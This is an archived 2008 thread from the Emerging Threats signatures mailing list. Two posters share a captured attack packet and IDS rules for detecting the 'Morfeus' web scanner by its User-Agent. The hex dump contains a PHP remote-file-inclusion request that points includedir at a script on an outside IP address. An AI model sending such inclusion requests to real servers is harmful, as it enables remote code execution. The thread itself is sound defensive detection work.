[prev in list] [next in list] [prev in thread] [next in thread]
List: emerging-sigs
Subject: [Emerging-Sigs] Emerging-sigs Digest, Vol 11, Issue 7
From: pppmarinho () gmail ! com (Pedro Marinho)
Date: 2008-10-06 13:16:32
Message-ID: ae49404b0810060616y2a0b899dgec52104b6fbacfa () mail ! gmail ! com
[Download RAW message or body]
Ok Matt thank you.
2008/10/6, Matt Jonkman <jonkman at jonkmans.com>:
>
> We have one for this, but I've simplified it a bit:
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB PHP
> Attack Tool Morfeus F Scanner"; flow:established,to_server;
> content:"User-Agent\: Morfeus "; nocase;
> reference:url,www.webmasterworld.com/search_engine_spiders/3227720.htm;
> classtype:web-application-attack; sid:2003466; rev:4;)
>
> Thanks Pedro!
>
> Matt
>
> Pedro Marinho wrote:
> > Hello Guys,
> >
> > i did received an attack here so looking at the payload i did this rule
> > because i am quite sure we don?t have a rule for this user agent..
> >
> >
> > payload
> >
> >
> > comprimento = 256
> >
> > 000 : 47 45 54 20 2F 74 6F 6F 6C 73 2F 73 65 6E 64 5F GET /tools/send_
> >
> > 010 : 72 65 6D 69 6E 64 65 72 73 2E 70 68 70 3F 6E 6F reminders.php?no
> >
> > 020 : 53 65 74 3D 30 26 69 6E 63 6C 75 64 65 64 69 72 Set=0&includedir
> >
> > 030 : 3D 68 74 74 70 3A 2F 2F 37 32 2E 35 32 2E 32 32 =http://72.52.22
> >
> > 040 : 35 2E 31 31 36 2F 7E 68 65 6C 69 72 75 73 2F 63 5.116/~helirus/c
> >
> > 050 : 73 73 2F 6D 65 65 66 2E 74 78 74 3F 3F 3F 3F 3F ss/meef.txt?????
> >
> > 060 : 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 / HTTP/1.1..Acce
> >
> > 070 : 70 74 3A 20 2A 2F 2A 0D 0A 41 63 63 65 70 74 2D pt: */*..Accept-
> >
> > 080 : 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 75 73 0D Language: en-us.
> >
> > 090 : 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 .Accept-Encoding
> >
> > 0a0 : 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D : gzip, deflate.
> >
> > 0b0 : 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 72 .User-Agent: Mor
> >
> > 0c0 : 66 65 75 73 20 46 75 63 6B 69 6E 67 20 53 63 61 feus Fucking Sca
> >
> > 0d0 : 6E 6E 65 72 0D 0A 48 6F 73 74 3A 20 ** ** ** 2E nner..Host: ***.
> >
> > 0e0 : ** ** 2E ** ** ** 2E ** ** 0D 0A 43 6F 6E 6E 65 *.*.*..Conne
> >
> > 0f0 : 63 74 69 6F 6E 3A 20 43 6C 6F 73 65 0D 0A 0D 0A ction: Close....
> >
> > Rule:
> >
> > alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET
> > SCAN Morfeus Fucking Scanner UA Detected"; flow:established,to_server;
> > content:"|0d 0a|User-Agent\: Morfeus Fucking Scanner";
> > classtype:web-application-activity; sid:2008***; rev:1;)
> >
> > ps: someone did see this in his/her IDS?
> >
> >
> > ------------------------------------------------------------------------
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
> --
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20081006/b55e271d/attachment.html
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic